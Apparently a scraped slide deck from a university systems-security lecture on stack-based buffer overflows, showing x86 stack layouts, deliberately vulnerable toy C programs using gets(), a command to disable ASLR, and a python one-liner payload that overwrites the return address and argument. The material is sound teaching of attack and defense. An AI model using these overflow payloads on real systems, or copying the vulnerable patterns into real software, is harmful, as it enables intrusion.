cse 610 special topics system security attack and defense
play

CSE 610 Special Topics: System Security - Attack and Defense for - PowerPoint PPT Presentation

Apr 17, 2023 •139 likes •873 views

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Online Time: Monday, 5:20 PM - 8:10 PM Last Class 1. Stack-based buffer overflow-1 a. Brief history of buffer overflow b.

  1. CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Online Time: Monday, 5:20 PM - 8:10 PM

  2. Last Class 1. Stack-based buffer overflow-1 a. Brief history of buffer overflow b. Program variables (global, local, initialized, uninitialized) c. C calling conventions (x86, x86-64) d. Overflow local variables e. Overflow RET address to call a function

  3. Homework-2 Hw-2 walkthrough

  4. Today’s Agenda 1. Stack-based buffer overflow-2 a. Overflow RET and return to a function with parameters (32-bit) b. Overflow to return/call multiple functions with parameters (32-bit) c. Overflow with shellcode (32-bit and 64 bit)

  5. Draw the stack (x86 cdecl)

  6. X86 Stack Usage ● Accesses local variables (negative indexing over ebp) mov -0x8(%ebp), %eax value at ebp-0x8 lea -0x24(%ebp), %eax address as ebp-0x24 ● Stores function arguments from caller (positive indexing over ebp) mov 0x8(%ebp), %eax 1st arg mov 0xc(%ebp), %eax 2nd arg ● Positive indexing over esp Function arguments to callee

  7. amd64 Stack Usage ● Access local variables (negative indexing over rbp) mov -0x8(%rbp), %rax lea -0x24(%rbp), %rax ● Access function arguments from caller mov %rdi, %rax ● Setup parameters for callee mov %rax, %rdi

  8. Conditions we depend on to pull off the attack of returning to a function in the address space 1. The function is already in the address space 2. The ability to overwrite RET addr on stack before instruction ret is executed 3. Know the address of the destination function 4. The ability to set up arguments (32-bit on stack; 64-bit in register)

  9. Insecure C functions strcpy(), memcpy(), gets(), ... https://github.com/intel/safestringlib/wiki/SDL-List-of-Banned-Functions

  10. Return to a function with parameter(s)

  11. Buffer Overflow Example: code/overflowret2 int printsecret(int i) { if (i == 0x12345678) printf("Congratulations! You made it!\n"); else printf("I pity the fool!\n"); exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); } Use “echo 0 | sudo tee /proc/sys/kernel/randomize_va_space” on Ubuntu to disable ASLR temporarily

  12. ... int printsecret(int i) ... { if (i == 0x12345678) RET printf("Congratulations! You made it!\n"); Saved EBP else %ebp printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  13. ... int printsecret(int i) ... { if (i == 0x12345678) Addr of printsecret printf("Congratulations! You made it!\n"); AAAA else %ebp printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  14. ... int printsecret(int i) ... { if (i == 0x12345678) Addr of printsecret printf("Congratulations! You made it!\n"); AAAA else %esp, %ebp printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { char buf[6]; mov %ebp, %esp gets(buf); pop %ebp return 0;} ret int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  15. ... int printsecret(int i) ... { %ebp = AAAA if (i == 0x12345678) Addr of printsecret printf("Congratulations! You made %esp it!\n"); AAAA else printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { char buf[6]; mov %ebp, %esp gets(buf); pop %ebp return 0;} ret int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  16. ... %ebp = AAAA int printsecret(int i) ... { %esp if (i == 0x12345678) Addr of printsecret printf("Congratulations! You made it!\n"); AAAA else printf("I pity the fool!\n"); %eip = Addr of printsecret buf exit(0);} int vulfoo() { char buf[6]; mov %ebp, %esp gets(buf); pop %ebp return 0;} ret int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  17. ... %ebp = AAAA int printsecret(int i) ... { if (i == 0x12345678) AAAA printf("Congratulations! You made %esp it!\n"); AAAA else printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { push %ebp char buf[6]; mov %esp, %ebp gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  18. ... int printsecret(int i) ... { if (i == 0x12345678) AAAA printf("Congratulations! You made %ebp, %esp it!\n"); AAAA else printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { push %ebp char buf[6]; mov %esp, %ebp gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  19. i: Parameter1 int printsecret(int i) RET { if (i == 0x12345678) AAAA: saved EBP printf("Congratulations! You made %ebp, %esp it!\n"); AAAA else printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) Address of i to overwrite: { Buf + sizeof(buf) + 12 printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  20. Overwrite RET and More 0x12345678 int printsecret(int i) Does not matter { if (i == 0x12345678) Addr of printsecret printf("Congratulations! You made it!\n"); Does not matter else %ebp printf("I pity the fool!\n"); %eax buf exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) Exploit will be something like: { printf("The addr of printsecret is %p\n", python -c "print 'A'*18+'\x2d\x62\x55\x56' + 'A'*4 + '\x78\x56\x34\x12'" | ./or2 printsecret); vulfoo(); printf("I pity the fool!\n"); }

  21. Overwrite RET and More 0x12345678 int printsecret(int i) Does not matter { if (i == 0x12345678) Addr of printsecret printf("Congratulations! You made it!\n"); Does not matter else %ebp printf("I pity the fool!\n"); %eax buf exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) Exploit will be something like: { printf("The addr of printsecret is %p\n", python -c "print 'A'*18+'\x2d\x62\x55\x56' + 'A'*4 + '\x78\x56\x34\x12'" | ./or2 printsecret); vulfoo(); printf("I pity the fool!\n"); }

  22. Return to function with many arguments? j: Parameter2 i: Parameter1 int printsecret(int i, int j) RET { if (i == 0x12345678 && j == 0xdeadbeef) AAAA: saved EBP printf("Congratulations! You made %ebp, %esp it!\n"); AAAA else printf("I pity the fool!\n"); buf exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); }

  23. Buffer Overflow Example: code/overflowret3 int printsecret(int i, int j) { if (i == 0x12345678 && j == 0xdeadbeef) printf("Congratulations! You made it!\n"); else printf("I pity the fool!\n"); exit(0);} int vulfoo() { char buf[6]; gets(buf); return 0;} int main(int argc, char *argv[]) { printf("The addr of printsecret is %p\n", printsecret); vulfoo(); printf("I pity the fool!\n"); } Use “echo 0 | sudo tee /proc/sys/kernel/randomize_va_space” on Ubuntu to disable ASLR temporarily

  24. Can we return to a chain of functions?

  25. (32 bit) Return to multiple functions? 1. Before epilogue of vulfoo arg-v-2 arg-v-1 Can RET = f1 overwrite once Saved EBP = A %ebp Padding buf

  26. (32 bit) Return to multiple functions? 1. Before 2. After epilogue of epilogue of vulfoo vulfoo arg-v-2 arg-v-2 arg-v-1 arg-v-1 %esp RET = f1 RET = f1 %ebp Saved EBP = Saved EBP = = A A A %ebp Padding Padding %eip = f1 buf buf

  27. (32 bit) Return to multiple functions? 3. after prologue of f1 1. Before 2. After epilogue of epilogue of arg-f1-2 vulfoo vulfoo arg-v-2 arg-v-2 arg-f1-1 arg-v-1 arg-v-1 RET = f2 %esp Saved EBP = RET = f1 RET = f1 %ebp A %ebp Saved EBP = Saved EBP = Saved EBP = = A A A A %ebp Padding Padding Padding %eip = f1 buf buf buf

Recommend

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Frnczk 408, North campus Time: Monday, 5:20 PM - 8:10 PM Todays Agenda 1. Cache side channel attack Speed Gap Between CPU and

535 views • 42 slides
CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Frnczk 408, North campus Time: Monday, 5:20 PM - 8:10 PM Last Class 1. Defenses a. Direct defense b. Stack Cookie; Canary -

713 views • 26 slides
CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Frnczk 408, North campus Time: Monday, 5:20 PM - 8:10 PM Last Class 1. Defenses a. Address Space Layout Randomization (ASLR)

872 views • 19 slides
CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Online Time: Monday, 5:20 PM - 8:10 PM First off, Logistics! Turn on camera if possible Classes are recorded and released

1.42k views • 116 slides
CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming

CSE 610 Special Topics: System Security - Attack and Defense for Binaries Instructor: Dr. Ziming Zhao Location: Frnczk 408, North campus Time: Monday, 5:20 PM - 8:10 PM Announcements 1. Final Exam : 12/14 2020 7:15PM-10:15PM. Same format as

483 views • 15 slides
Network Security CIA +Availability By Jinjian Ma Topics DOS/DDoS Detection & Defense

Network Security CIA +Availability By Jinjian Ma Topics DOS/DDoS Detection & Defense

Network Security CIA +Availability By Jinjian Ma Topics DOS/DDoS Detection & Defense Prevention DOS/DDoS Types Vulnerability attack Flooding attack DoS vs DDoS DoS: Attack is launched from single host Less

614 views • 26 slides
ss 8 Class Cl CSC 495/583 Topics of Software Security PLT, GOT & Return-to-plt Attack

ss 8 Class Cl CSC 495/583 Topics of Software Security PLT, GOT & Return-to-plt Attack

ss 8 Class Cl CSC 495/583 Topics of Software Security PLT, GOT & Return-to-plt Attack & GOT Overwrite Attack Dr. Si Chen (schen@wcupa.edu) Review Page 2 ret2libc Attack Page 3 libc C standard library Provides

662 views • 36 slides
Serverless security: attack & defense www.securing.pl #whoami Senior Security Consultant in

Serverless security: attack & defense www.securing.pl #whoami Senior Security Consultant in

www.securing.pl Pawel Rzepa Serverless security: attack & defense www.securing.pl #whoami Senior Security Consultant in - Pentesting - Cloud security assessment Blog: https://medium.com/@rzepsky @Rzepsky

1.1k views • 63 slides
Attacking JAVA Serialized Communication Manish S. Saindane Who am I ? Security Researcher

Attacking JAVA Serialized Communication Manish S. Saindane Who am I ? Security Researcher

ATTACK & & ATTACK labs DEFENSE DEFENSE Attacking JAVA Serialized Communication Manish S. Saindane Who am I ? Security Researcher Working as a Lead Applica8on Security Specialist for an interna8onal so:ware development and

577 views • 28 slides
Preview question Which of these defense techniques would completely prevent a ROP attack from

Preview question Which of these defense techniques would completely prevent a ROP attack from

Preview question Which of these defense techniques would completely prevent a ROP attack from returning from an intended CSci 5271 return instruction to an unintended gadget? Introduction to Computer Security A. ASLR Day 6: Low-level defenses

125 views • 9 slides
Exploit Development 101 ATTACK & DEFENSE HISTORY OF WINDOWS BUFFER OVERFLOW Peter Chi

Exploit Development 101 ATTACK & DEFENSE HISTORY OF WINDOWS BUFFER OVERFLOW Peter Chi

Exploit Development 101 ATTACK & DEFENSE HISTORY OF WINDOWS BUFFER OVERFLOW Peter Chi chiwp@tw.ibm.com 2020/08/11 About Me IBM CDL Software Engineer Columbia Univ. Master of Science Computer Security Track OSCP / OSCE / eWPT /

1.11k views • 22 slides
Towards Attack-Agnostic Defense for 2D and 3D Recognition Hao Su Workshop on Adversarial Machine

Towards Attack-Agnostic Defense for 2D and 3D Recognition Hao Su Workshop on Adversarial Machine

Towards Attack-Agnostic Defense for 2D and 3D Recognition Hao Su Workshop on Adversarial Machine Learning in Real-World Computer Vision Systems Long Beach, CA, USA 1 Outline Background and Motivation Project-based Defense Mechanism

761 views • 72 slides
Web security With material from Dave Levin, Mike Hicks, Lujo Bauer Previously Attack and

Web security With material from Dave Levin, Mike Hicks, Lujo Bauer Previously Attack and

Web security With material from Dave Levin, Mike Hicks, Lujo Bauer Previously Attack and defense at host machines Applications written in C and C++ Violations of memory safety Web security now Attacking web services

830 views • 37 slides
CMPSC 497 Special Topics: Software Security Trent Jaeger Systems and Internet

CMPSC 497 Special Topics: Software Security Trent Jaeger Systems and Internet

Systems and Internet Infrastructure Security Network and Security Research Center Department of Computer Science and Engineering Pennsylvania State University, University Park PA CMPSC 497 Special Topics: Software Security Trent Jaeger

745 views • 27 slides
Protection and Security Threat is potential security violation Attack is attempt to breach

Protection and Security Threat is potential security violation Attack is attempt to breach

CSC 4103 - Operating Systems The Security Problem Spring 2007 Security must consider external environment of the system, and protect the system resources Lecture - XX Intruders (crackers) attempt to breach security Protection and

195 views • 4 slides
Surveillance Defense Small Easy Steps for Security and Privacy Pete Snyder psnyde2@uic.edu -

Surveillance Defense Small Easy Steps for Security and Privacy Pete Snyder psnyde2@uic.edu -

Surveillance Defense Small Easy Steps for Security and Privacy Pete Snyder psnyde2@uic.edu - peteresnyder.com Surveillance Defense 1. Good Practices 2. System / PC Security 3. Mobile Security 4. Browser Security 5. Secure Networking Tools

443 views • 27 slides
Security Overview Security Goals The Attack Space Security Mechanisms

Security Overview Security Goals The Attack Space Security Mechanisms

CSCE Intro to Computer Systems Security Security Overview Security Goals The Attack Space Security Mechanisms Introduction to Cryptography Authentication Authorization Confidentiality Case Studies Security

472 views • 20 slides
Special Topics in Cryptography Mohammad Mahmoody Last time How to combine CPA security +

Special Topics in Cryptography Mohammad Mahmoody Last time How to combine CPA security +

Special Topics in Cryptography Mohammad Mahmoody Last time How to combine CPA security + MACS: Security against active attacks CCA secure private-key encryption Today Public-key encryption and key-agreement RSA (PKE) and

358 views • 14 slides
Security & Compliance Thursday, September 4 2014 What is a security breach/attack? A

Security & Compliance Thursday, September 4 2014 What is a security breach/attack? A

Security & Compliance Thursday, September 4 2014 What is a security breach/attack? A security breach/attack is defined as an event in which a corporations network is compromised or an individuals name plus Social Security Name (SSN),

890 views • 12 slides
Security Overview Security Goals The Attack Space Security Mechanisms

Security Overview Security Goals The Attack Space Security Mechanisms

CPSC 410/611 Operating Systems Security Security Overview Security Goals The Attack Space Security Mechanisms Introduction to Cryptography Authentication Authorization Confidentiality Case Studies

419 views • 19 slides
Attacking with HTML5 Lavakumar Kuppan Who am I ? Web Security Researcher of Attack and

Attacking with HTML5 Lavakumar Kuppan Who am I ? Web Security Researcher of Attack and

A TTACK TTACK & D EFENSE EFENSE labs Attacking with HTML5 Lavakumar Kuppan Who am I ? Web Security Researcher of Attack and Defense Labs, www.andlabs.org Penetration Tester @ really big bank Author of Imposter & Shell

872 views • 58 slides
Bro 2.0 and Beyond Network Attack Detection and Defense Early Warning Systems Schloss Dagstuhl,

Bro 2.0 and Beyond Network Attack Detection and Defense Early Warning Systems Schloss Dagstuhl,

The Bro Network Security Monitor Bro 2.0 and Beyond Network Attack Detection and Defense Early Warning Systems Schloss Dagstuhl, 2012 Dagstuhl 2012 2 Outline Bro Introduction Much different from the typical IDS you may know Hot off

742 views • 63 slides
Defense Security Service Defense Security Service Cybersecurity Operations Division

Defense Security Service Defense Security Service Cybersecurity Operations Division

UNCLASSIFIED//FOUO Defense Security Service Defense Security Service Cybersecurity Operations Division Counterintelligence UNCLASSIFIED//FOUO UNCLASSIFIED Defense Security Service DSS Mission Capability DSS Supports national security and

490 views • 33 slides
17-654: Analysis of Software Systems Spring 2005 4/21/2005 Topics Timing attack

17-654: Analysis of Software Systems Spring 2005 4/21/2005 Topics Timing attack

17-654: Analysis of Software Systems Spring 2005 4/21/2005 Topics Timing attack Algorithms leak information Nice example of practice trumping theoretical security Hardening algorithms: randomization Privilege separation

1.11k views • 69 slides

More recommend